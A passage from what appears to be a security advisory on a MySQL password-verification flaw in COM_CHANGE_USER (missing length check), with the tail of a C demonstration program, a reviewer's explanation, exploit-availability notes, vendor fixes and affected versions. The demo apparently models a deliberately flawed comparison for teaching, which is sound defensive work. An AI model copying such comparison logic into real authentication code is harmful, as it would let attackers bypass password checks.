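           SCRAMBLE_ALPHABET);
    printf("hardened check, full correct reply: %s\n",
           check_scramble_fixed(EXPECTED, EXPECTED) ? "accepted" : "rejected");
    return 0;
}
```

The point for a reviewer of authentication code is that the length check belongs in every code path that verifies a credential, not only the login handshake: the 2000 fix added it to the connection handler, and this CVE exists because COM_CHANGE_USER re-implemented the comparison without it. Compile with `gcc -std=c99 -Wall` and run; no database is needed.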

- Exploitation

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

Exploit is available:

- Solution

EnGarde has released updated fixes. The original fixes did not address the COM_TABLE_DUMP vulnerability (BID 6368). The upgraded packages now include fixes for this vulnerability.

Gentoo Linux has released an advisory. Users who have installed dev-db/mysql-3.23.53 and earlier are urged to update their systems by issuing the following commands:

emerge rsync
emerge mysql
emerge clean

OpenPKG has released an advisory (OpenPKG-SA-2002.013) which addresses this issue. Please see the attached advisory for details on fixing this issue on systems using OpenPKG.

Conectiva Linux and Debian have released advisories. Information about obtaining and applying fixes can be found in the referenced advisories.

SuSE has released an advisory (SuSE-SA:2003:003) which addresses this issue. Please see the attached advisory for details on obtaining and applying fixes.

Veritas has released an advisory and updated feature and maintenance packs to address this issue.

This issue has been addressed in MySQL 3.23.54.


MySQL AB MySQL 3.22.32
MySQL AB MySQL 3.23.10
MySQL AB MySQL 3.23.22
MySQL AB MySQL 3.23.23
MySQL AB MySQL 3.23.24
MySQL AB MySQL 3.23.25
MySQL AB MySQL 3.23.26
MySQL AB MySQL 3.23.27
MySQL AB MySQL 3.23.28
MySQL AB MySQL 3.23.29
MySQL AB MySQL 3.23.3
MySQL AB MySQL 3.23.30
MySQL AB MySQL 3.23.31
MySQL AB MySQL 3.23.32
MySQL AB MySQL 3.23.33
MySQL AB MySQL 3.23.34
MySQL AB MySQL 3.23.36
MySQL AB MySQL 3.23.37
MySQL AB MySQL 3.23.38
MySQL AB MySQL 3.23.39
MySQL AB MySQL 3.23.4
MySQL AB MySQL 3.23.40
MySQL AB MySQL 3.23.41
MySQL AB MySQL 3.23.42
MySQL AB MySQL 3.23.43
MySQL AB MySQL 3.23.44
MySQL AB MySQL 3.23.45
MySQL AB MySQL 3.23.46
MySQL AB MySQL 3.23.47
MySQL AB MySQL 3.23.48
MySQL AB MySQL 3.23.49
MySQL AB MySQL 3.23.5
MySQL AB MySQL 3.23.50
MySQL AB MySQL 3.23.51
MySQL AB MySQL 3.23.52
